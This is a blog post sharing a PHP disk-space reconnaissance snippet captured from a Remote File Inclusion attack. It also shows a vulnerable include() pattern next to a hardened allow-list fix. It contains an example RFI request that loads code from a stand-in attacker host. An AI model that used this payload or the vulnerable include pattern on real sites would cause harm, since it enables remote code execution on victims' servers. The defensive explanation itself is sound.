
Best of RFI - Part 1

Posted in hacks/PHP/ on May 16, 2009 by Marcus.

Even a loser gets lucky sometimes

Like millions of other hosts on the internet, this box gets attacked by people trying to exploit vulnerabilities.

I recently saw the following piece of code in a Remote File Inclusion (RFI) attack. Although it might have been created by a kid, it's still a nice snippet that I want to share with you. Guess what, it actually works.

Disclaimer: I'm unsure about the license.

<?php
// Picks the unit from the number of digits in $number, not from its magnitude:
// 999999 bytes (6 digits) prints as "976.56 Kb", 1000000 bytes (7 digits) as "0.95 Mb".
function ConvertBytes($number){
    $len=strlen($number);
    if($len<4){
        return sprintf("%d b",$number);
    }
    if(($len>=4)&&($len<=6)){
        return sprintf("%0.2f Kb",$number/1024);
    }
    if(($len>=7)&&($len<=9)){
        return sprintf("%0.2f Mb",$number/1024/1024);
    }
    return sprintf("%0.2f Gb",$number/1024/1024/1024);
}

// The directory the including script runs from, i.e. the victim's web root.
$dir=@getcwd();

// free (disk_free_space() returns false on failure, which ends up as "0 b")
$freeBytes= disk_free_space($dir);
$freeUnits= ConvertBytes($freeBytes);
if(!$freeUnits)$freeUnits=0;   // never triggers: ConvertBytes() always returns a non-empty string

// total
$allBytes= disk_total_space($dir);
$allUnits= ConvertBytes($allBytes);
if(!$allUnits)$allUnits=0;     // same here

// used
$usedUnits= ConvertBytes($allBytes-$freeBytes);

// Output lands inside the victim's HTML response, hence the <br>.
echo('free: '  .$freeUnits."<br>\r\n");
echo('total: '.$allUnits  ."<br>\r\n");
echo('used: '  .$usedUnits."<br>\r\n");
?>

I personally like the CamelCase approach, the sprintf() usage and the early returns. What do you think?
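For context, here is the kind of include() that lets a remote snippet like the one above run on a victim, next to a hardened version. This is an added example and not code from the original post or from the attack; the script name (index.php), the parameter name (page) and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example, not from the original post: the include() pattern behind a
// typical RFI, and a hardened replacement. index.php, the "page" parameter and
// the pages/ directory are assumed names for illustration.

// ---- Vulnerable: a tainted value reaches include() ---------------------------
// Request:  /index.php?page=http://attacker.example/probe.txt?
// With allow_url_include=On (PHP >= 5.2; earlier versions only had
// allow_url_fopen) PHP fetches the URL, parses it as PHP and executes it as the
// web server user. The trailing '?' turns the appended ".php" into a query
// string on the attacker's server, so the suffix does not get in the way.
// (Defined for comparison only; it is never called below.)
function render_page_vulnerable()
{
    $page = isset($_GET['page']) ? $_GET['page'] : 'home';
    include $page . '.php';
}

// ---- Hardened: allow-list the key, then contain the resolved path -----------
const ALLOWED_PAGES = array(
    'home'  => 'home.php',
    'about' => 'about.php',
);

// Returns the rendered page, or null when the request is rejected.
function render_page_hardened($requested)
{
    // 1. Never build a path from user input; map a known key to a fixed file.
    //    is_string() first: ?page[]=x makes $_GET['page'] an array.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    // 2. Defence in depth: resolve the path and require it to stay under pages/.
    $base = realpath(__DIR__ . '/pages');
    $path = ($base === false) ? false : realpath($base . '/' . ALLOWED_PAGES[$requested]);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    ob_start();
    include $path;
    return ob_get_clean();
}

// Entry point.
$out = render_page_hardened(isset($_GET['page']) ? $_GET['page'] : 'home');
if ($out === null) {
    http_response_code(404);
    exit;
}
echo $out;
```

The allow-list is the actual fix: once include() only ever sees one of a few fixed file names, neither a URL nor a ../ sequence can reach it, and the realpath() containment check is just a second line of defence against future edits. Independently of the code, set allow_url_include = Off in php.ini (the default since it was introduced in PHP 5.2), turn allow_url_fopen off where the application does not need it, and use open_basedir to fence in what include() can read at all.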

Tags: php, rfi, snippet